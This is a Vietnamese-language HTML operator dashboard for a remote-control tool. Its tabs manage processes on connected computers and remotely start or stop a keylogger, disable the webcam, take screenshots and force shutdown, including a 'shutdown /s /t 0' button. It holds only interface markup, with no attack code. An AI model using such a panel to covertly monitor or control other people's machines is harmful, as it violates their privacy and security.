<!DOCTYPE html>
<html lang="vi">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Remote Control - Điều khiển từ xa</title>
    
    <!-- External CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.10.0/font/bootstrap-icons.css" rel="stylesheet">
    
    <!-- Custom CSS -->
    <link href="css/style.css" rel="stylesheet">
</head>
<body>
    <div class="main-container">
        <div class="container-fluid">
            <div class="row">
                <!-- Sidebar - Agents List -->
                <div class="col-md-3">
                    <div class="card">
                        <div class="card-header">
                            <h5 class="mb-0">
                                <i class="bi bi-pc-display"></i> Máy tính kết nối
                            </h5>
                        </div>
                        <div class="card-body">
                            <button class="btn btn-light w-100 mb-3" onclick="refreshAgents()">
                                <i class="bi bi-arrow-clockwise"></i> Làm mới
                            </button>
                            <div id="agentsList">
                                <p class="text-muted text-center">Chưa có máy nào kết nối</p>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Main Content -->
                <div class="col-md-9">
                    <div class="card">
                        <div class="card-header d-flex justify-content-between align-items-center">
                            <h4 class="mb-0">
                                <i class="bi bi-gear"></i> Bảng điều khiển
                            </h4>
                            <span id="selectedAgent" class="badge bg-light text-dark">Chưa chọn máy</span>
                        </div>
                        <div class="card-body">
                            <!-- No agent selected -->
                            <div id="noAgentMessage" class="text-center py-5">
                                <i class="bi bi-arrow-left-circle" style="font-size: 48px; color: #667eea;"></i>
                                <h5 class="mt-3">Vui lòng chọn máy tính từ danh sách bên trái</h5>
                            </div>

                            <!-- Control Panel -->
                            <div id="controlPanel" style="display: none;">
                                <!-- Tabs -->
                                <ul class="nav nav-tabs mb-3" id="mainTabs">
                                    <li class="nav-item">
                                        <a class="nav-link active" data-bs-toggle="tab" href="#tabApps">
                                            <i class="bi bi-window"></i> Ứng dụng
                                        </a>
                                    </li>
                                    <li class="nav-item">
                                        <a class="nav-link" data-bs-toggle="tab" href="#tabProcesses">
                                            <i class="bi bi-cpu"></i> Processes
                                        </a>
                                    </li>
                                    <li class="nav-item">
                                        <a class="nav-link" data-bs-toggle="tab" href="#tabPower">
                                            <i class="bi bi-power"></i> Nguồn
                                        </a>
                                    </li>
                                    <li class="nav-item">
                                        <a class="nav-link" data-bs-toggle="tab" href="#tabKeylogger">
                                            <i class="bi bi-keyboard"></i> Keylogger
                                        </a>
                                    </li>
                                    <li class="nav-item">
                                        <a class="nav-link" data-bs-toggle="tab" href="#tabWebcam">
                                            <i class="bi bi-webcam"></i> Webcam
                                        </a>
                                    </li>
                                    <li class="nav-item">
                                        <a class="nav-link" data-bs-toggle="tab" href="#tabScreenshot">
                                            <i class="bi bi-camera"></i> Chụp màn hình
                                        </a>
                                    </li>
                                </ul>

                                <div class="tab-content">
                                    <!-- Applications Tab -->
                                    <div class="tab-pane fade show active" id="tabApps">
                                        <div class="control-panel">
                                            <div class="d-flex justify-content-between mb-3">
                                                <h5><i class="bi bi-window"></i> Danh sách ứng dụng đang chạy</h5>
                                                <div>
                                                    <button class="btn btn-primary btn-sm" onclick="listApps()">
                                                        <i class="bi bi-arrow-clockwise"></i> Làm mới
                                                    </button>
                                                    <button class="btn btn-success btn-sm" onclick="showStartDialog()">
                                                        <i class="bi bi-plus-circle"></i> Khởi động mới
                                                    </button>
                                                </div>
                                            </div>
                                            <div class="loading" id="appsLoading">
                                                <div class="spinner-border text-primary"></div>
                                                <p>Đang tải...</p>
                                            </div>
                                            <div class="process-table">
                                                <table class="table table-hover" id="appsTable">
                                                    <thead class="table-light">
                                                        <tr>
                                                            <th>Tên ứng dụng</th>
                                                            <th>Tiêu đề</th>
                                                            <th>PID</th>
                                                            <th>Threads</th>
                                                            <th>RAM (MB)</th>
                                                            <th>Hành động</th>
                                                        </tr>
                                                    </thead>
                                                    <tbody id="appsList"></tbody>
                                                </table>
                                            </div>
                                        </div>
                                    </div>

                                    <!-- Processes Tab -->
                                    <div class="tab-pane fade" id="tabProcesses">
                                        <div class="control-panel">
                                            <div class="d-flex justify-content-between mb-3">
                                                <h5><i class="bi bi-cpu"></i> Task Manager - Tất cả Processes</h5>
                                                <div>
                                                    <button class="btn btn-primary btn-sm" onclick="listProcesses()">
                                                        <i class="bi bi-arrow-clockwise"></i> Làm mới
                                                    </button>
                                                    <button class="btn btn-success btn-sm" onclick="showStartDialog()">
                                                        <i class="bi bi-plus-circle"></i> Khởi động mới
                                                    </button>
                                                </div>
                                            </div>
                                            
                                            <!-- Quick Launch Apps -->
                                            <div class="mb-3">
                                                <small class="text-muted fw-bold">⚡ Mở nhanh:</small>
                                                <div class="d-flex flex-wrap gap-1 mt-2">
                                                    <button class="btn btn-outline-primary btn-sm" onclick="quickStart('notepad')"><i class="bi bi-file-text"></i> Notepad</button>
                                                    <button class="btn btn-outline-primary btn-sm" onclick="quickStart('calc')"><i class="bi bi-calculator"></i> Calc</button>
                                                    <button class="btn btn-outline-primary btn-sm" onclick="quickStart('cmd')"><i class="bi bi-terminal"></i> CMD</button>
                                                    <button class="btn btn-outline-primary btn-sm" onclick="quickStart('taskmgr')"><i class="bi bi-cpu"></i> Task Mgr</button>
                                                    <button class="btn btn-outline-success btn-sm" onclick="quickStart('chrome')"><i class="bi bi-browser-chrome"></i> Chrome</button>
                                                    <button class="btn btn-outline-success btn-sm" onclick="quickStart('msedge')"><i class="bi bi-browser-edge"></i> Edge</button>
                                                    <button class="btn btn-outline-warning btn-sm" onclick="quickStart('explorer')"><i class="bi bi-folder"></i> Explorer</button>
                                                    <button class="btn btn-outline-info btn-sm" onclick="quickStart('mspaint')"><i class="bi bi-palette"></i> Paint</button>
                                                </div>
                                            </div>
                                            
                                            <div class="mb-3">
                                                <input type="text" class="form-control" id="processSearch" 
                                                       placeholder="Tìm kiếm process..." onkeyup="filterProcesses()">
                                            </div>
                                            <div class="loading" id="processesLoading">
                                                <div class="spinner-border text-primary"></div>
                                                <p>Đang tải...</p>
                                            </div>
                                            <div class="process-table">
                                                <table class="table table-hover" id="processesTable">
                                                    <thead class="table-light">
                                                        <tr>
                                                            <th>Tên Process</th>
                                                            <th>PID</th>
                                                            <th>Threads</th>
                                                            <th>RAM (MB)</th>
                                                            <th>Hành động</th>
                                                        </tr>
                                                    </thead>
                                                    <tbody id="processesList"></tbody>
                                                </table>
                                            </div>
                                        </div>
                                    </div>

                                    <!-- Power Tab -->
                                    <div class="tab-pane fade" id="tabPower">
                                        <div class="danger-zone">
                                            <h5 class="text-danger"><i class="bi bi-exclamation-triangle"></i> Khu vực nguy hiểm</h5>
                                            <p class="text-muted">Các thao tác dưới đây sẽ ảnh hưởng đến máy tính từ xa.</p>
                                            <hr>
                                            <div class="row">
                                                <div class="col-md-6">
                                                    <div class="card mb-3">
                                                        <div class="card-body text-center">
                                                            <i class="bi bi-power text-warning" style="font-size: 48px;"></i>
                                                            <h5 class="mt-2">Tắt máy</h5>
                                                            <p class="text-muted">Máy tính sẽ tắt sau 10 giây</p>
                                                            <button class="btn btn-warning" onclick="shutdownPC()">
                                                                <i class="bi bi-power"></i> Shutdown
                                                            </button>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="col-md-6">
                                                    <div class="card mb-3">
                                                        <div class="card-body text-center">
                                                            <i class="bi bi-arrow-repeat text-info" style="font-size: 48px;"></i>
                                                            <h5 class="mt-2">Khởi động lại</h5>
                                                            <p class="text-muted">Máy tính sẽ restart sau 10 giây</p>
                                                            <button class="btn btn-info" onclick="restartPC()">
                                                                <i class="bi bi-arrow-repeat"></i> Restart
                                                            </button>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>

                                    <!-- Keylogger Tab -->
                                    <div class="tab-pane fade" id="tabKeylogger">
                                        <div class="control-panel">
                                            <h5><i class="bi bi-keyboard"></i> Keylogger - Ghi phím từ xa</h5>
                                            <p class="text-muted">Theo dõi các phím được nhấn trên máy tính từ xa.</p>
                                            <hr>
                                            <div class="row mb-3">
                                                <div class="col-md-6">
                                                    <button class="btn btn-success btn-lg w-100" onclick="startKeylogger()" id="btnStartKeylogger">
                                                        <i class="bi bi-play-fill"></i> Bắt đầu ghi phím
                                                    </button>
                                                </div>
                                                <div class="col-md-6">
                                                    <button class="btn btn-danger btn-lg w-100" onclick="stopKeylogger()" id="btnStopKeylogger">
                                                        <i class="bi bi-stop-fill"></i> Dừng ghi phím
                                                    </button>
                                                </div>
                                            </div>
                                            <div class="mb-3">
                                                <div class="d-flex justify-content-between align-items-center mb-2">
                                                    <label class="form-label mb-0"><strong>Phím đã ghi:</strong></label>
                                                    <div>
                                                        <div class="form-check form-switch d-inline-block me-3">
                                                            <input class="form-check-input" type="checkbox" id="autoRefreshKeylog" onchange="toggleKeylogAutoRefresh()">
                                                            <label class="form-check-label" for="autoRefreshKeylog">Tự động làm mới</label>
                                                        </div>
                                                        <button class="btn btn-sm btn-outline-primary" onclick="getKeylog()">
                                                            <i class="bi bi-arrow-clockwise"></i> Làm mới
                                                        </button>
                                                        <button class="btn btn-sm btn-outline-secondary" onclick="clearKeylogDisplay()">
                                                            <i class="bi bi-trash"></i> Xóa
                                                        </button>
                                                    </div>
                                                </div>
                                                <textarea class="form-control" id="keylogOutput" rows="15" readonly 
                                                    placeholder="Các phím được ghi sẽ hiển thị ở đây..."></textarea>
                                            </div>
                                            <div class="alert alert-warning">
                                                <i class="bi bi-exclamation-triangle"></i> <strong>Cảnh báo:</strong> 
                                                Chỉ sử dụng chức năng này cho mục đích hợp pháp. Việc theo dõi người khác mà không có sự đồng ý là vi phạm pháp luật.
                                            </div>
                                        </div>
                                    </div>

                                    <!-- Webcam Tab -->
                                    <div class="tab-pane fade" id="tabWebcam">
                                        <div class="control-panel">
                                            <h5><i class="bi bi-webcam"></i> Điều khiển Webcam</h5>
                                            <p class="text-muted">Bật hoặc tắt webcam trên máy tính từ xa.</p>
                                            <hr>
                                            <div class="row">
                                                <div class="col-md-6">
                                                    <div class="card mb-3 border-danger">
                                                        <div class="card-body text-center">
                                                            <i class="bi bi-camera-video-off text-danger" style="font-size: 48px;"></i>
                                                            <h5 class="mt-2">Tắt Webcam</h5>
                                                            <p class="text-muted">Vô hiệu hóa webcam</p>
                                                            <button class="btn btn-danger" onclick="disableWebcam()">
                                                                <i class="bi bi-camera-video-off"></i> Tắt Webcam
                                                            </button>
                                                        </div>
                                                    </div>
                                                </div>
                                                <div class="col-md-6">
                                                    <div class="card mb-3 border-success">
                                                        <div class="card-body text-center">
                                                            <i class="bi bi-camera-video text-success" style="font-size: 48px;"></i>
                                                            <h5 class="mt-2">Bật Webcam</h5>
                                                            <p class="text-muted">Kích hoạt lại webcam</p>
                                                            <button class="btn btn-success" onclick="enableWebcam()">
                                                                <i class="bi bi-camera-video"></i> Bật Webcam
                                                            </button>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="alert alert-info mt-3">
                                                <i class="bi bi-info-circle"></i> <strong>Lưu ý:</strong> Cần quyền Administrator trên máy bị điều khiển để tắt/bật webcam.
                                            </div>
                                        </div>
                                    </div>

                                    <!-- Screenshot Tab -->
                                    <div class="tab-pane fade" id="tabScreenshot">
                                        <div class="control-panel">
                                            <div class="d-flex justify-content-between mb-3">
                                                <h5><i class="bi bi-camera"></i> Chụp màn hình từ xa</h5>
                                                <button class="btn btn-primary" onclick="takeScreenshot()">
                                                    <i class="bi bi-camera"></i> Chụp màn hình
                                                </button>
                                            </div>
                                            <hr>
                                            <div class="loading" id="screenshotLoading" style="display: none;">
                                                <div class="spinner-border text-primary"></div>
                                                <p>Đang chụp màn hình...</p>
                                            </div>
                                            <div id="screenshotContainer" class="text-center">
                                                <div id="noScreenshot" class="py-5">
                                                    <i class="bi bi-image text-muted" style="font-size: 64px;"></i>
                                                    <p class="text-muted mt-3">Nhấn "Chụp màn hình" để xem màn hình máy tính từ xa</p>
                                                </div>
                                                <img id="screenshotImage" src="" alt="Screenshot" class="img-fluid rounded shadow" style="display: none; max-width: 100%; cursor: pointer;" onclick="openScreenshotFullscreen()">
                                            </div>
                                            <div id="screenshotInfo" class="mt-3" style="display: none;">
                                                <div class="d-flex justify-content-between align-items-center">
                                                    <small class="text-muted" id="screenshotTime"></small>
                                                    <div>
                                                        <button class="btn btn-sm btn-outline-primary" onclick="downloadScreenshot()">
                                                            <i class="bi bi-download"></i> Tải xuống
                                                        </button>
                                                        <button class="btn btn-sm btn-outline-secondary" onclick="openScreenshotFullscreen()">
                                                            <i class="bi bi-fullscreen"></i> Toàn màn hình
                                                        </button>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <!-- Screenshot Fullscreen Modal -->
    <div class="modal fade" id="screenshotModal" tabindex="-1">
        <div class="modal-dialog modal-fullscreen">
            <div class="modal-content bg-dark">
                <div class="modal-header border-0">
                    <button type="button" class="btn btn-light btn-sm" onclick="downloadScreenshot()">
                        <i class="bi bi-download"></i> Tải xuống
                    </button>
                    <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button>
                </div>
                <div class="modal-body d-flex align-items-center justify-content-center p-0">
                    <img id="screenshotModalImage" src="" alt="Screenshot" class="img-fluid">
                </div>
            </div>
        </div>
    </div>

    <!-- Start Process Modal -->
    <div class="modal fade" id="startModal" tabindex="-1">
        <div class="modal-dialog modal-lg">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title"><i class="bi bi-plus-circle"></i> Khởi động ứng dụng</h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal"></button>
                </div>
                <div class="modal-body">
                    <div class="mb-3">
                        <label class="form-label">Tên ứng dụng hoặc đường dẫn:</label>
                        <input type="text" class="form-control" id="processNameInput" 
                               placeholder="Ví dụ: notepad, calc, chrome...">
                    </div>
                    
                    <hr>
                    <p class="fw-bold mb-3"><i class="bi bi-grid"></i> Ứng dụng phổ biến - Nhấn để mở:</p>
                    
                    <div class="row g-2">
                        <!-- System Apps -->
                        <div class="col-12 mb-2">
                            <small class="text-muted fw-bold">🖥️ Hệ thống</small>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-primary w-100 quick-app-btn" onclick="quickStart('notepad')">
                                <i class="bi bi-file-text"></i><br>Notepad
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-primary w-100 quick-app-btn" onclick="quickStart('calc')">
                                <i class="bi bi-calculator"></i><br>Calculator
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-primary w-100 quick-app-btn" onclick="quickStart('mspaint')">
                                <i class="bi bi-palette"></i><br>Paint
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-primary w-100 quick-app-btn" onclick="quickStart('explorer')">
                                <i class="bi bi-folder"></i><br>Explorer
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-primary w-100 quick-app-btn" onclick="quickStart('cmd')">
                                <i class="bi bi-terminal"></i><br>CMD
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-primary w-100 quick-app-btn" onclick="quickStart('powershell')">
                                <i class="bi bi-terminal-fill"></i><br>PowerShell
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-primary w-100 quick-app-btn" onclick="quickStart('taskmgr')">
                                <i class="bi bi-cpu"></i><br>Task Manager
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-primary w-100 quick-app-btn" onclick="quickStart('control')">
                                <i class="bi bi-gear"></i><br>Control Panel
                            </button>
                        </div>

                        <!-- Browsers -->
                        <div class="col-12 mb-2 mt-3">
                            <small class="text-muted fw-bold">🌐 Trình duyệt</small>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-success w-100 quick-app-btn" onclick="quickStart('chrome')">
                                <i class="bi bi-browser-chrome"></i><br>Chrome
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-success w-100 quick-app-btn" onclick="quickStart('msedge')">
                                <i class="bi bi-browser-edge"></i><br>Edge
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-success w-100 quick-app-btn" onclick="quickStart('firefox')">
                                <i class="bi bi-browser-firefox"></i><br>Firefox
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-success w-100 quick-app-btn" onclick="quickStart('opera')">
                                <i class="bi bi-globe"></i><br>Opera
                            </button>
                        </div>

                        <!-- Office & Media -->
                        <div class="col-12 mb-2 mt-3">
                            <small class="text-muted fw-bold">📁 Office & Media</small>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-warning w-100 quick-app-btn" onclick="quickStart('winword')">
                                <i class="bi bi-file-word"></i><br>Word
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-warning w-100 quick-app-btn" onclick="quickStart('excel')">
                                <i class="bi bi-file-excel"></i><br>Excel
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-warning w-100 quick-app-btn" onclick="quickStart('powerpnt')">
                                <i class="bi bi-file-ppt"></i><br>PowerPoint
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-warning w-100 quick-app-btn" onclick="quickStart('wmplayer')">
                                <i class="bi bi-music-note-beamed"></i><br>Media Player
                            </button>
                        </div>

                        <!-- Others -->
                        <div class="col-12 mb-2 mt-3">
                            <small class="text-muted fw-bold">🎮 Khác</small>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-danger w-100 quick-app-btn" onclick="quickStart('shutdown /s /t 0')">
                                <i class="bi bi-power"></i><br>Tắt máy ngay
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-info w-100 quick-app-btn" onclick="quickStart('snippingtool')">
                                <i class="bi bi-scissors"></i><br>Snipping Tool
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-info w-100 quick-app-btn" onclick="quickStart('osk')">
                                <i class="bi bi-keyboard"></i><br>On-Screen KB
                            </button>
                        </div>
                        <div class="col-4 col-md-3">
                            <button class="btn btn-outline-info w-100 quick-app-btn" onclick="quickStart('magnify')">
                                <i class="bi bi-zoom-in"></i><br>Magnifier
                            </button>
                        </div>
                    </div>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Hủy</button>
                    <button type="button" class="btn btn-success" onclick="startProcess()">
                        <i class="bi bi-play"></i> Khởi động
                    </button>
                </div>
            </div>
        </div>
    </div>

    <!-- Toast Container -->
    <div class="toast-container" id="toastContainer"></div>

    <!-- External JavaScript -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
    
    <!-- Custom JavaScript -->
    <script src="js/app.js"></script>
</body>
</html>
